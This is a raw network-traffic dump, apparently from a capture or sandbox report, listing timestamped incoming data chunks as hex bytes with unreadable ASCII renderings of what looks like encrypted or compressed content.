                                                                                                        2022-09-29 12:46:11 UTC9829INData Raw: f9 02 c9 09 c8 68 64 cf 10 4c bf 0c 90 e8 a2 38 03 21 63 46 8b f8 d0 dd c7 7b 80 7c d2 98 fd 10 32 d0 9a 46 3d ce fd a4 47 72 6f a6 8a 14 02 b2 49 d0 5a 42 c4 f4 59 36 43 03 8b fa 4d 3b 27 ba d3 54 dd d0 e5 df 97 a6 08 ec 0f b3 f6 bc 3e d8 98 b7 d1 fe 83 46 53 93 25 8e 50 32 7e 3c 7a 7e 5e 09 f7 62 20 03 04 20 9b 7b 2c 41 88 14 62 1e 17 fd bc f5 8b 03 ac 01 22 28 bf ba ed e3 fc 7c 05 c1 88 34 6a 64 28 9d 92 27 00 91 07 7e 78 d6 61 fa 51 28 2f ac 4c fd 55 f6 6a b2 44 6d 9f 0d ee 76 f3 8e e8 18 e6 5b 9a 30 5b 6e 14 b3 87 62 cc a3 94 87 15 0c d8 21 1a d2 76 94 dc f9 38 53 23 f9 54 66 c3 19 d3 5d f6 d1 e0 e3 4b 7f 1b 9b 2a e1 31 29 80 a2 78 90 e7 e3 3f e4 d7 e5 22 b4 dd 4d 34 39 1a b9 d7 a3 1f 4a 7d 45 38 91 19 56 08 12 24 bb 55 7f 05 61 af ad 97 74 cc 1a 2b
                                                                                                        Data Ascii: hdL8!cF{|2F=GroIZBY6CM;'T>FS%P2~<z~^b {,Ab"(|4jd('~xaQ(/LUjDmv[0[nb!v8S#Tf]K*1)x?"M49J}E8V$Uat+
                                                                                                        2022-09-29 12:46:11 UTC9845INData Raw: 62 3a f3 4e cb b0 1a a5 bd 00 71 16 a3 fa 67 de 84 07 ec d0 17 a8 3a 88 bb 5c 86 09 d3 a3 9c 85 2c 13 00 36 66 e9 f8 e6 df 76 d8 2c c2 90 ce 7f db d7 cf 21 82 e4 cd 91 cc eb 71 91 06 d9 24 8e f4 7a 19 a6 77 84 24 36 46 01 30 6b 9e 63 55 37 cd 6e 5a 11 6b e4 25 0b a8 7d 45 de 55 9d de e5 18 4e a6 58 da 20 d4 a7 b6 f7 76 b6 f9 77 a6 a2 67 35 53 eb 8f 26 47 eb 29 1f 92 67 69 30 4b 57 1b 77 c8 77 8f 8f 81 bd f1 11 12 f9 ad 2f e0 f4 df 44 4a 55 83 1c a1 fa 68 6f bd 3c 09 2c 36 fb 06 f5 a8 ea 2f 15 57 c7 03 e2 38 47 f2 ce 36 09 8c a8 4c a0 6f 1b 32 00 8c 76 39 01 2d a0 cf 5f b6 25 5e 63 d6 83 0a 1b a5 d3 06 43 b2 3c 7b d3 ab 18 5d 6c 9f 8a e1 ed 8d 98 ae f4 89 b2 1f 9b 96 bf e1 55 fa 0a 64 0b a0 f7 87 71 92 ac 14 3b 79 71 64 89 d0 39 22 b0 cb 8a 25 46 f2 25 5c
                                                                                                        Data Ascii: b:Nqg:\,6fv,!q$zw$6F0kcU7nZk%}EUNX vwg5S&G)gi0KWww/DJUho<,6/W8G6Lo2v9-_%^cC<{]lUdq;yqd9"%F%\
                                                                                                        2022-09-29 12:46:11 UTC9861INData Raw: 7f c4 88 4c 88 16 e3 0c 7e 54 fa b0 35 64 58 62 f4 42 f1 6e f9 52 c1 ea 50 39 f9 32 0d 95 1f ae bd fa c1 3a 5e 3f bd e0 3a e6 dc c9 af 9f 1b 59 2c 2a 8b 43 29 ae 37 3c ec 0a aa f0 79 05 c0 d9 b5 c8 24 48 6c e8 49 13 4d 35 eb 53 7e 68 7a 7b 19 19 b6 b3 dd d3 3a 5c 81 f1 4c aa 8b 23 97 23 ce 43 31 c1 63 ee 95 50 42 a4 41 12 17 90 63 26 60 ea 95 0b 2c ec 66 57 f6 71 62 ce 6d fe 87 2e b3 35 91 09 de a1 60 b7 a0 a6 db a7 7f 07 d5 80 0f 27 f6 94 a0 ed 8d 60 bb ad ad 32 4d 71 5f 2e a7 ea b8 c4 43 f3 cd 1b 61 a2 6b 49 27 99 24 96 a5 00 bd fe cb 3c bf f8 1a e1 a2 a8 73 a8 f5 c8 20 60 ac 43 84 ed d7 1b 14 3a 66 c8 2a e4 38 ba ca 9e 65 d5 6c f0 a0 81 ea 57 a2 4b f5 a8 d5 27 3f 67 cd 40 67 79 16 b1 a3 da 7d 45 e7 e4 9d 9c f8 79 1a 7c 84 e0 68 8c d4 6e 94 cf c5 db 89
                                                                                                        Data Ascii: L~T5dXbBnRP92:^?:Y,*C)7<y$HlIM5S~hz{:\L##C1cPBAc&`,fWqbm.5`'`2Mq_.CakI'$<s `C:f*8elWK'?g@gy}Ey|hn
                                                                                                        2022-09-29 12:46:11 UTC9877INData Raw: cf f2 e3 06 23 c0 59 14 d4 d7 c6 05 d3 8d 9b 28 3f 6e be d5 1a d9 c1 c3 14 8e 2d 33 18 89 86 0c cc 46 43 5a 0a f4 3f 6a 4a ab b5 c8 40 fe 44 55 da 95 c0 6e 08 d3 df 7e ab 33 10 2d a5 87 1a 25 5f 26 08 a6 dc 9e 63 c6 43 69 64 dd 06 76 9e ea 3f 3d f9 7b c5 64 0c e4 f1 99 fb 72 2d 0a 5e 70 81 89 05 59 9e a4 5b 3d 58 67 9a 2d cb 7c c1 1c bb 23 35 61 76 d8 ba 4a 9a cf 53 cd a9 2f ce b1 96 e6 c2 5c 8b a5 b7 95 09 95 29 86 e0 d2 16 90 3b bb 56 5b 76 25 ab 28 56 c1 92 e2 bf 47 be 39 fb 38 47 6f 61 42 1f e6 59 e8 c0 7c 6b f0 7e df db 3d 6d 76 9a e5 8d ee 5b 74 7e 1e 8f 64 49 57 0b bd 83 65 43 15 ce 46 da bf ed 25 e8 02 f1 58 4b 6d b9 58 c6 8f bd a7 78 c6 92 df 31 a0 78 1d bc 61 f7 52 ed 59 ed 20 20 51 be 97 01 4e 0b d6 19 79 e4 29 a4 8e 95 80 db a4 ea 62 0d f2 ff
                                                                                                        Data Ascii: #Y(?n-3FCZ?jJ@DUn~3-%_&cCidv?={dr-^pY[=Xg-|#5avJS/\);V[v%(VG98GoaBY|k~=mv[t~dIWeCF%XKmXx1xaRY QNy)b
                                                                                                        2022-09-29 12:46:11 UTC9893INData Raw: fd 90 d6 1a fa 0f 6b 09 37 56 3c 35 13 f8 91 32 73 a8 7c 7f 79 a4 b1 7c 3d b6 d4 b6 f0 70 c1 88 6d 90 3c 1f a1 cc 25 64 25 f8 dc 78 d2 74 21 6f 2e 3f cd 87 00 13 b0 85 62 66 f4 80 6f eb 25 55 17 37 51 2b bc 22 fb 65 ac 00 b1 63 94 0c 27 c4 47 c7 28 00 71 58 d3 77 c4 be c6 a9 e9 96 1f c5 e3 ca 04 db 39 e7 53 08 c1 93 84 f5 4b ca e0 70 93 43 fb 9e 14 b6 9a 85 6b fa 9f d8 54 6b 84 58 b4 4b 35 95 4f aa 34 09 df 6b 25 1f 6e 06 be 3a 5c 74 2d 83 cd 08 12 06 49 84 af f9 ed ac 86 25 11 a4 ad 5b d0 c7 f6 03 0e f3 d5 c0 26 60 c0 c8 1f 10 02 1b 20 7d fa 4f 47 95 1f 99 10 88 84 67 33 c4 aa 49 33 29 4d 86 16 a7 90 4f 13 b8 5e eb 1b 6e e7 ae 59 a3 40 ad 30 96 aa f1 34 1b 9e 9d a9 64 92 07 d1 96 b3 1d 0c b5 a2 f9 5e f9 f0 4d 4d aa e5 4c 6a 2a 19 95 ab af 07 f0 8d 79 e5
                                                                                                        Data Ascii: k7V<52s|y|=pm<%d%xt!o.?bfo%U7Q+"ec'G(qXw9SKpCkTkXK5O4k%n:\t-I%[&` }OGg3I3)MO^nY@04d^MMLj*y
                                                                                                        2022-09-29 12:46:11 UTC9909INData Raw: 09 75 ef 5f 02 04 59 6e b4 38 36 05 32 53 a7 ef 1a fd 11 df d6 c8 24 90 b8 6c 56 66 5c 44 eb bb ab 69 06 d8 02 09 1e 32 30 a1 48 53 66 e5 3e b0 ad 59 e3 77 aa 71 85 45 81 eb 36 d4 54 ec 30 1c d9 ae d7 60 0e 24 28 44 e2 1b 00 03 77 64 58 25 65 6c 59 1d 4e 7f 9e b2 75 b7 87 3e 11 59 d3 5d e7 ee cb c0 a7 98 6e 7b e0 f3 dd be 72 44 63 00 26 f0 ea d4 c6 d2 90 0e 21 85 1a ed 07 88 a2 54 3e 34 77 ea 94 29 d3 00 b1 36 49 ad 4e 8c 96 d4 ff 2c 60 3c 96 82 c0 39 61 fd 47 18 8c 60 c1 ab 2a f9 96 89 06 4c 2d d0 da 34 39 23 d7 34 55 43 ff 7e 91 80 f8 38 af d3 37 56 80 47 52 e2 c9 0d 6a 1f af bb 59 a3 0a 45 ff 30 6d 9d fa f5 a4 46 8e 88 35 38 5c 7d a6 8d d3 cb 31 cd d4 47 01 53 07 bc a0 b1 ad 5b 81 ea a2 16 70 ab 97 b8 91 6a f9 46 62 92 e7 3c 1c 34 28 df c0 f2 18 5e ca
                                                                                                        Data Ascii: u_Yn862S$lVf\Di20HSf>YwqE6T0`$(DwdX%elYNu>Y]n{rDc&!T>4w)6IN,`<9aG`*L-49#4UC~87VGRjYE0mF58\}1GS[pjFb<4(^
                                                                                                        2022-09-29 12:46:11 UTC9925INData Raw: 4f 4e bf 69 a6 58 19 fd 7c 45 7e 13 c2 b5 a0 bc 16 16 cf 2a 36 06 13 e5 9f 62 93 2f 1a 38 9d 49 8f e8 70 d2 fd 4b 7a d1 3c b6 c9 c1 3d 85 db 6f a0 68 1e 23 0b 00 20 c0 6b ee f5 0b 66 12 98 77 0a c0 24 64 e6 ac 6b a3 4b 9b e8 9e 7a a5 45 2f 86 f7 fa ea 6b 59 e5 65 95 0c 9d 1c 10 f7 c0 d6 fa d4 02 4b 8b e9 7b 72 2c b0 68 f4 af b9 ac d4 80 8d 22 86 97 a1 7d 09 2d 10 63 8d 91 31 dc d6 55 58 7b 63 a5 9a 3d fb 08 85 d5 ae c6 67 0a 53 4b 16 60 af 74 55 c5 e0 fa 6c 6c 98 c3 59 e4 58 57 f4 9b 8c 5b cf 52 55 0f 1d 26 1c 4b b2 c1 48 23 6b e8 c5 35 70 d6 93 38 96 09 3e 2f 8a 68 38 d0 c4 4b 3d 1f 24 b6 bf 95 36 ad fd c5 5f 5d 59 82 8e 2a b0 2f 50 9d 3d 3f 15 cb fe f4 24 94 41 ba 68 6e e5 bb a9 5a a0 0a 1e 6b e4 32 a4 85 f5 53 8a 63 4b 4c 53 3f 93 87 0d 7f 82 37 0c 45
                                                                                                        Data Ascii: ONiX|E~*6b/8IpKz<=oh# kfw$dkKzE/kYeK{r,h"}-c1UX{c=gSK`tUllYXW[RU&KH#k5p8>/h8K=$6_]Y*/P=?$AhnZk2ScKLS?7E
                                                                                                        2022-09-29 12:46:11 UTC9941INData Raw: 67 a9 b9 9c bb 87 77 3b 87 07 f4 8a b4 69 01 9c dc b4 92 4c 8f c5 30 d7 d7 b2 bd 0c 36 d3 34 1a 11 95 2f ae 20 24 eb 03 1d 32 77 09 22 2e 1c 21 48 52 30 ba ae 02 05 f0 60 33 70 4b 26 58 39 56 d9 73 48 6a be 9f bf 61 d6 c9 44 c5 49 bb 95 73 4d 8b a5 8e fa c6 46 94 08 64 c9 5c 16 78 89 ef 2b 03 d9 48 97 76 3f f5 4e 39 f7 88 f9 22 5c b6 cd e0 c7 c4 56 f1 2d 51 aa e2 db e6 e7 a0 54 52 6d e2 f4 e8 9a 2b 99 e6 39 b5 98 98 e8 d3 da b0 01 5c 31 29 b5 6b b1 ab f4 68 0a 61 0b 37 82 bf 6a cf cf 7e 9a db ef 73 ef 6c 4c 90 5c 1c 9a 11 83 02 67 0c 9e 4a ff d9 26 65 33 ed 07 83 6d 5f ea 14 09 7f 9c 92 fa 16 71 ba 6c 5a ce 6e f1 84 6d 5d d8 38 d7 82 ba 28 cd 5a d2 9a 38 8c 23 b4 f7 4e 44 3a 29 8b fe 26 98 d5 fe 56 95 88 56 27 3d 98 08 17 44 2f 01 f7 bd d8 20 8e 65 53 e1
                                                                                                        Data Ascii: gw;iL064/ $2w".!HR0`3pK&X9VsHjaDIsMFd\x+Hv?N9"\V-QTRm+9\1)kha7j~slL\gJ&e3m_qlZnm]8(Z8#ND:)&VV'=D/ eS
                                                                                                        2022-09-29 12:46:11 UTC9957INData Raw: 55 c2 1b 7c 1a fa d3 b6 07 07 d3 39 ab b9 7b 64 e5 10 a9 1a cd 7c 77 c1 a3 6d 7a 36 0a 2a c6 bc 60 79 cb e7 5d f7 52 1a 07 fc eb 48 4c da bd 5d 0b 52 b8 16 b7 55 85 a6 df 04 e4 9e c5 3f 18 31 5e 02 90 0e 9a 86 ab 31 cc 68 55 5d 11 88 63 ba 51 f3 ae c2 db ad b4 15 73 1e fa 42 a4 c1 14 31 e0 6f 69 e6 43 bf 1e d8 0f 9d 3e 2d 40 94 04 e8 4a 12 8c 3c e5 d1 85 96 99 e8 41 54 fb 31 c2 4d 57 53 a3 c4 69 95 62 f4 98 40 c7 76 63 63 30 47 a5 65 ed 7f 47 99 f0 e5 d5 66 e0 41 a6 97 d2 e3 b5 3e 0e 7c a1 d5 2c 85 80 7b 71 f7 63 1e b7 5c 8b af 5e 2f fe ad dd 6c 60 0d 78 7f 3f a8 74 c8 3b 1b c5 58 09 0e a9 e4 9c f3 a3 5e ad 73 9f 3b 8b 88 3f af 90 75 24 d4 3f 5d 8a aa 9b 47 68 0b d2 0e 93 5d 0f 38 b4 c6 53 5a 7d c3 ec b3 ea 94 b5 35 05 c1 8b b5 85 d4 1e 8c 91 71 b7 76 68
                                                                                                        Data Ascii: U|9{d|wmz6*`y]RHL]RU?1^1hU]cQsB1oiC>-@J<AT1MWSib@vcc0GeGfA>|,{qc\^/l`x?t;X^s;?u$?]Gh]8SZ}5qvh
                                                                                                        2022-09-29 12:46:11 UTC9973INData Raw: a9 d0 cc 7f 31 a9 cc 02 4f f4 2b 79 57 04 41 b3 27 a2 0b d9 21 d7 07 40 ad 1e a9 1e 69 6d ee 9f 49 09 98 46 a6 7b 2b 83 63 19 1d 13 55 9f e9 03 55 ee 4d 63 97 6e 9d b6 b1 2d bf 7d 65 bc a4 b2 bc 82 67 f4 99 36 43 44 8d 4c 7d 38 cf ba e9 de db 0d d9 b8 a6 14 00 f8 6a 05 7a 50 60 13 b2 af 80 ea 9a da 11 9e 2a bd 2a 21 ef 01 41 4a a1 3b bb 91 27 87 8e 09 38 bb 3b 55 2f db af 98 ef 7e de 36 49 96 fe 74 77 bf 60 46 f9 35 a2 fb 10 7d 62 5a 5c d4 a0 ee 46 83 55 c9 c4 0e cf c8 8e b7 59 aa 54 f3 87 63 46 f5 25 ce b5 7e 0b b1 4a 91 68 b7 86 ed 09 9a b7 78 86 89 c2 07 33 83 dc 46 ae 90 09 32 90 d0 de e6 48 ca 24 0f e3 72 45 6b d3 fd 0e ab 9c 43 95 c8 eb aa e7 94 cf 08 a5 74 8e 1c e4 2c 1d d4 33 33 73 39 29 a2 be 8a cc 9d f7 5f 6e 2a c1 d9 fd 91 52 47 3f 6d b1 1c 81
                                                                                                        Data Ascii: 1O+yWA'!@imIF{+cUUMcn-}eg6CDL}8jzP`**!AJ;'8;U/~6Itw`F5}bZ\FUYTcF%~Jhx3F2H$rEkCt,33s9)_n*RG?m
                                                                                                        2022-09-29 12:46:11 UTC9989INData Raw: 29 3a 21 ae d6 f9 a6 2d 6b c0 90 5b 3c 4d 1c a5 5b 08 9e a2 61 8d f4 fa e9 92 6b fa 69 ec 5e d9 78 cd db b3 90 4e 9f b3 07 d0 9c b8 e3 eb 09 6c 3a fc a0 57 0b ce e1 77 da 1a 09 f4 3b ea 47 4c b5 f7 e0 22 f2 3c 7f df b8 06 b4 9e dd 88 59 7d 67 cf cf 06 36 0f 83 56 d5 9f 3a 9d f8 33 0f ad 10 74 26 66 13 b1 53 c6 05 6c 21 aa 46 63 f7 81 45 db fd 46 3e 29 3c 7f 0c 51 18 93 85 d9 4e b3 4d de ba 97 11 02 99 db c3 66 1c 11 cb 8b fc 4a ef ef 38 76 04 78 b6 be c0 9d 2a 11 dc 01 80 e1 0d 38 67 fa 3e af 7e 0e ea 91 16 9d 09 79 08 db 71 eb d5 21 74 08 bc e1 eb a6 06 3a 6b 0a 36 b2 ab d2 62 9c 3e da d5 09 1f b2 48 86 5c be 83 dc f0 07 95 ba 23 a5 a6 1f 0d 5c ae cb fc 55 ec ee 9e 67 4b da 79 f5 db e4 32 ff 9f c8 a7 24 b8 5d fe 6c 00 8a 80 10 84 3c a1 34 3c ea e4 6f 7b
                                                                                                        Data Ascii: ):!-k[<M[aki^xNl:Ww;GL"<Y}g6V:3t&fSl!FcEF>)<QNMfJ8vx*8g>~yq!t:k6b>H\#\UgKy2$]l<4<o{
                                                                                                        2022-09-29 12:46:11 UTC10005INData Raw: ac f5 72 a7 bf f4 80 b1 fe d7 62 19 36 09 f5 3a 0b 53 d1 c2 b3 ab 23 5f bf 28 8e 9a 94 71 eb 16 fe ab ef f0 7c f6 1e fb fe 00 62 cd b8 7d 9d 10 87 33 09 34 2c c0 f0 a9 45 58 d0 30 e4 17 be bc c8 ce c9 c9 bb 44 be 98 e0 04 35 57 61 52 8d b6 77 de 59 64 6e c0 ae 80 7c 79 dd c1 ed d8 de 16 b4 04 2e 3d 30 ea bb a8 1f 07 78 76 78 62 fa e8 e5 3b 1d 84 c0 96 9d bc ef 8d 1f 13 f1 e8 e8 2e 5a 71 ce 9b 65 9e ff 15 cf 9f 1e 66 0d da 26 2b 4c a6 e3 5b c4 d3 d4 69 83 20 ec ab f3 fa 93 64 4d 2b 27 83 34 01 52 50 61 7a a1 09 d5 b9 9f 79 b4 79 cd 8b 9a bc 5e 2e 4a 23 84 60 3a ca b4 03 2a 01 1f 10 f3 6a 26 90 67 d3 2f 58 85 66 8a 25 36 c3 3e 85 c8 93 51 68 a1 2b 1f 98 8e 81 13 76 f3 94 3c c8 8b b3 19 18 21 5b 4c fb 16 93 6d 51 5d e7 e2 e2 a4 4d 0f 93 25 83 cd cf 24 c7 af
                                                                                                        Data Ascii: rb6:S#_(q|b}34,EX0D5WaRwYdn|y.=0xvxb;.Zqef&+L[i dM+'4RPazyy^.J#`:*j&g/Xf%6>Qh+v<![LmQ]M%$
                                                                                                        2022-09-29 12:46:11 UTC10021INData Raw: af c7 a0 3d e5 78 7f 88 1b 74 12 d7 e6 d7 91 a1 1d bb 3b e1 8e 79 45 fd 57 a7 e2 ff e6 94 fb c2 03 52 24 ba ab 51 79 fd b4 26 d7 d1 6d 0f 45 c9 96 ff 57 3c 2c b6 ae 24 43 0c b7 04 84 96 8d 3b 54 fd 17 a2 cb 88 dd 15 61 71 79 4b 70 ab ac dc 05 90 fa 8e be c9 e6 b3 bc aa 7c 46 04 cb d8 dc 35 84 9b 4a 5a 3e a2 3f f8 44 10 21 2c b9 2c b5 ee 98 db 25 e2 b2 04 6f c1 0e 18 f3 24 df f3 0b b8 81 10 ff 36 da 02 cf b8 37 a6 8b f6 a2 1b e2 19 eb c0 63 14 f3 d6 17 e9 d6 12 b6 16 cf 66 15 7f 09 25 da 20 91 f8 51 26 5f f3 82 ff 71 8f cd 58 9f 75 f4 c4 a9 28 f2 2e e9 b2 4f f9 c3 bd f5 f9 1b 30 49 2a 62 c7 f8 c6 0e 80 c9 47 27 56 bd 3a d4 93 cf 4a 1a f5 34 df 21 fc 93 83 ef c0 76 7c ff a7 8f 03 75 07 e1 62 92 6e 7f b9 40 09 13 4c f9 8a 95 dc bf 3f 27 ab 3b 7b 43 94 30 7f
                                                                                                        Data Ascii: =xt;yEWR$Qy&mEW<,$C;TaqyKp|F5JZ>?D!,,%o$67cf% Q&_qXu(.O0I*bG'V:J4!v|ubn@L?';{C0
                                                                                                        2022-09-29 12:46:11 UTC10037INData Raw: 59 87 9d 4b c1 05 cd f6 99 9c c7 83 8f a6 48 81 08 77 52 b8 05 45 39 c4 49 62 ba 68 6e b7 1d a9 7a ec b4 4c b4 38 32 a1 84 d1 fd 58 cf eb 0c a0 4d 00 35 82 1f 57 c8 a8 e1 3a a5 d9 ae f3 0b 66 a5 8b cb e7 68 be 8a 78 58 3b 98 bb 80 3d 68 b7 c4 15 c4 4e c1 cd 71 98 16 3e 8a 90 4f 55 b9 ea c3 e9 5a ee eb 6b 61 fa 2c 4a a3 11 ac 3b 5b b2 65 57 a0 e3 70 e3 06 5f 82 9d af 29 11 43 f6 86 48 cb 5a a0 9d c7 da 55 33 27 84 32 63 b6 96 01 a7 c9 e6 f3 40 de 83 d3 f6 15 d5 8f e1 e3 d2 4c 19 3a d7 d5 3b b7 a5 fa f6 d9 57 e1 1e a8 d7 3d a7 d0 8c 2c db 27 ea 30 19 16 f4 17 3e 9a c2 61 3d cb 78 9b a0 c3 fd 4c 73 4a 40 0c de 4c e4 a1 83 ae 2a e0 fc f4 ba 9b 17 64 c3 56 67 9e e0 ea 8d 89 79 04 5f 0d 23 e8 81 e2 bc c7 88 c1 38 11 c7 b2 ee f3 60 37 0a 50 b2 e1 3a 60 d9 6c a3
                                                                                                        Data Ascii: YKHwRE9IbhnzL82XM5W:fhxX;=hNq>OUZka,J;[eWp_)CHZU3'2c@L:;W=,'0>a=xLsJ@L*dVgy_#8`7P:`l
                                                                                                        2022-09-29 12:46:11 UTC10053INData Raw: 54 f8 91 48 d4 d9 a0 29 e8 22 b6 df 54 d1 ed ea f7 e7 a8 1d a4 35 df cd 64 74 85 fb 6a 28 c6 7a c7 0d d7 69 4a d4 29 83 95 64 29 79 d9 64 fa bd 78 7a 32 ca d0 3e 15 3d 6c 5c 22 e3 2c 08 26 b9 9d 5d 03 d2 52 1d 52 e8 e4 b5 74 da d9 05 eb 38 95 33 b5 35 d6 d8 93 5f 84 d4 82 8e 7f fa c8 c1 05 a3 4f bb ea b9 8a 05 2f 38 b2 92 cd 57 f3 c8 0d 17 eb b8 4b c3 39 7d a9 cf d9 42 21 59 22 58 f4 35 6e e9 4c ba 82 16 c7 a6 b8 64 c2 d6 63 31 c8 cd 1f ea a0 cd 27 df bd 0f 92 a9 36 60 21 49 21 27 5e 3a c8 bb 54 85 c6 08 84 94 2e 0c 42 59 0d 7f ab b0 45 6d 0d e3 92 26 d3 ce 8c 2d 12 38 2e 5b 20 1f eb e7 ef 31 56 8a 04 74 31 04 94 c8 31 68 c9 5e 15 11 6e c8 7d ff 7b 88 a6 6e 7d f7 35 09 95 92 e3 57 11 96 8f 4d 98 ca ef af db f2 12 40 68 bb 1d c6 bc 0a 1b 24 ee 4f 55 68 f4
                                                                                                        Data Ascii: TH)"T5dtj(ziJ)d)ydxz2>=l\",&]RRt835_O/8WK9}B!Y"X5nLdc1'6`!I!'^:T.BYEm&-8.[ 1Vt11h^n}{n}5WM@h$OUh
                                                                                                        2022-09-29 12:46:11 UTC10069INData Raw: ff 93 49 50 af ba 3e b1 f1 40 38 31 8f 8b ec f0 07 5f 0a 38 ae 49 32 ac 5d c7 27 4a 38 01 42 47 bc a4 bb c5 82 f7 10 6f da 3e c9 09 c5 35 e3 cb a4 8d b0 71 d1 45 f0 1a 50 78 54 21 b1 46 63 42 c4 fa c6 34 45 9d 49 3a a6 5e 15 7d 47 fb 44 51 a1 db f6 68 fe 44 44 d3 4b 4f 21 b7 c8 c4 0a d4 a1 56 a4 05 76 65 fa 19 95 63 ba 79 30 3d b3 cb 02 df 61 95 32 9d 97 dc b0 b9 9b ff d3 53 7d d3 5d a9 e0 68 27 ef c5 56 a2 68 11 f3 79 4d cd 47 c1 a5 4a f6 04 b6 2d 02 c3 a0 ce ba 0e 0c c9 ab f5 39 49 53 22 18 4b 6c f7 e2 ef a8 70 30 ab 84 29 60 a5 f7 57 62 f0 ca f3 d2 27 39 f8 63 e7 7c 7e 7c 94 84 5d 9e e4 fe 92 39 32 51 78 e6 2f 11 2d 22 61 ec d7 07 40 71 f5 5b e0 d9 1b da 38 d5 6b 3e c7 b0 a6 5c f7 12 17 4a 6e 0a bb b1 2f 8c 00 c9 56 d9 11 26 d9 e6 51 fd 66 82 e8 ce 32
                                                                                                        Data Ascii: IP>@81_8I2]'J8BGo>5qEPxT!FcB4EI:^}GDQhDDKO!Vvecy0=a2S}]h'VhyMGJ-9IS"Klp0)`Wb'9c|~|]92Qx/-"a@q[8k>\Jn/V&Qf2
                                                                                                        2022-09-29 12:46:11 UTC10078INData Raw: 84 8f f6 bd c9 a7 b1 be af 06 6a 08 e6 04 2a a4 1d 2e dc ff b4 85 3c 4b 20 38 64 a2 52 23 72 23 b5 db 83 64 b2 11 e3 45 bf 1e 6e b2 e4 76 24 28 a7 ab 4d 84 e2 1f 80 36 fd 1b 2b 77 ea 48 a6 63 7a 82 2e c9 4a a4 47 a6 07 08 a4 20 41 65 69 99 f5 91 a4 9a 42 61 30 a2 03 f6 c0 88 5a 5c 9c 1a b1 80 1b f5 16 61 10 02 cb 64 56 cd 03 14 39 a4 cd a0 9c 0e 51 29 36 5f 65 60 ee f5 ce 5e 25 71 22 18 b7 c1 b3 85 ab 42 62 f6 dc 05 82 18 4f a6 a1 90 36 99 56 4c 4c ae 8c 3a 4e 30 a2 ac 5c 21 75 07 f3 35 3d 5c 5a 49 85 d0 90 93 f7 b3 9d 01 7f 06 0c 3b 51 60 d1 2f 08 10 33 25 ac 04 d9 25 64 ff 06 8f 7b f8 3d bc f3 32 88 f1 c9 29 c2 2f c6 f5 34 20 a6 37 7f a2 66 c7 9f 01 a4 0b e2 d5 02 23 b1 f2 76 34 9f 29 1d 3b 7e 4b 43 ea 54 48 77 80 29 f4 73 ef bf 83 a8 d4 fd 6c 01 a1 2c
                                                                                                        Data Ascii: j*.<K 8dR#r#dEnv$(M6+wHcz.JG AeiBa0Z\adV9Q)6_e`^%q"BbO6VLL:N0\!u5=\ZI;Q`/3%%d{=2)/4 7f#v4);~KCTHw)sl,
                                                                                                        2022-09-29 12:46:11 UTC10094INData Raw: ab 30 0c 52 18 7d 2e ec db 29 24 12 47 29 6c 31 98 3f 00 bf ae 61 98 2e cd 95 3e 0e df 7a b0 62 b9 aa 1a 8e 25 c9 70 72 b9 13 0e 77 f2 0c 1f 29 e7 9e af ba 8d 49 5b c5 80 d2 5d 62 84 1c c4 86 07 5a 1b 57 ed ec 86 99 27 85 a9 e7 1a 32 a6 46 d8 92 8c 88 ff ab 51 9d 7b 79 f8 e9 54 ff 64 7e 21 f5 97 c8 3a a2 24 7f 7f 14 81 a6 4d b4 b1 68 3f 60 bb 1d b0 b7 72 1c d2 62 19 87 c1 2b f9 66 66 3a 7d dc ab 24 a3 9f 1d af 1e c8 e0 ad 1d 87 a6 90 08 70 20 f4 ac 5e c4 6a 4c 47 97 da 70 b4 1a 78 13 93 8c e4 e6 e3 c3 47 31 af 2e f2 b1 e3 f6 f0 fb eb 07 f5 47 62 9f 1f d0 de 25 f5 4c e6 2e 65 e1 11 87 bd f0 47 79 eb 32 cd e3 4f 92 ae b4 a9 36 f8 d4 6e cf af c2 d6 db ac 55 35 79 74 1e ba d0 b9 da 86 cb 85 b1 9d 54 bc ed 1a 0d c6 aa 8b 63 2a 6e ee 33 91 05 67 69 e9 58 f3 ad
                                                                                                        Data Ascii: 0R}.)$G)l1?a.>zb%prw)I[]bZW'2FQ{yTd~!:$Mh?`rb+ff:}$p ^jLGpxG1.Gb%L.eGy2O6nU5ytTc*n3giX
                                                                                                        2022-09-29 12:46:11 UTC10110INData Raw: 2b c6 75 f4 4a b3 a3 06 85 c7 9e 6b 7c 77 a7 b2 f7 75 cf 01 4c 8f 64 27 84 ac 13 79 72 26 51 2f cd b4 b2 97 8e 2a 04 3b 7f c1 65 bd ce c8 3b 2a a4 36 30 76 52 c6 8f f7 3a bb ae d6 5a 93 ed 61 90 a3 43 0a 29 c3 78 6a d5 26 94 00 ab 8b a6 c0 04 75 6b 31 5c c6 48 13 77 a3 69 f2 9a 87 d5 bb 13 ab 28 35 86 c8 d4 30 07 6b 71 3c 92 90 89 f9 bc 65 4b af 2c bb 80 ee 4d a1 7f 3b 8d e2 bf 42 f0 f2 a6 a8 f7 8f 18 cb 60 03 60 e6 b2 03 79 0d b3 d8 28 db 92 3a 88 da 9f 27 84 bf 93 07 30 17 95 61 d2 4e 2c 21 40 d8 de e1 d7 9b 80 49 3d ee b7 d1 15 dd 86 79 ff 07 20 15 97 fe 9c 85 ee 61 9f 7b 02 39 a1 63 56 42 3a 7d 8a 12 58 3e f6 47 4a 1c 54 a8 63 48 cc 30 fb 7e ed da 53 24 8e a9 79 68 ec 49 7b 88 ba b6 f3 3f 54 61 12 6b eb ea 8f ca 76 27 6c e5 c3 36 90 b9 63 48 8d e3 66
                                                                                                        Data Ascii: +uJk|wuLd'yr&Q/*;e;*60vR:ZaC)xj&uk1\Hwi(50kq<eK,M;B``y(:'0aN,!@I=y a{9cVB:}X>GJTcH0~S$yhI{?Takv'l6cHf
                                                                                                        2022-09-29 12:46:11 UTC10126INData Raw: 0b 1e b6 9f 95 a0 65 e6 59 b7 88 74 07 39 97 16 d6 5b ea 29 ec bb 65 cc 0d e9 18 1a bb ff 3a bf 4a 15 e9 aa 73 9e b3 e5 12 dd 59 1b be 18 c4 fc 0c 29 06 dc fd 7f 74 b4 05 b1 a1 17 24 2b b5 94 67 d2 44 7a b5 2b 17 54 fa e2 27 09 1d a2 6a 6e 64 7e 68 9f 0a f8 9f d2 99 e9 30 02 e5 61 7a ca 3d 9f e2 71 13 93 e8 a2 1d ea 7a 88 5d cf 1e e9 7e 74 b2 1c f9 2c cb 17 77 4c 7e 4f 52 e6 ab 12 d7 e1 35 35 35 e6 a5 65 99 82 6b 4c ac 4e 56 17 07 43 de 27 e7 61 4a 73 a2 36 17 49 ed 42 8d 0a 9a 45 f0 46 a8 3f d9 b0 e9 1d 47 20 60 07 62 15 32 7b 30 2f 9e 4f ca 97 14 a6 32 08 81 b8 4d 09 fb 84 21 11 fb 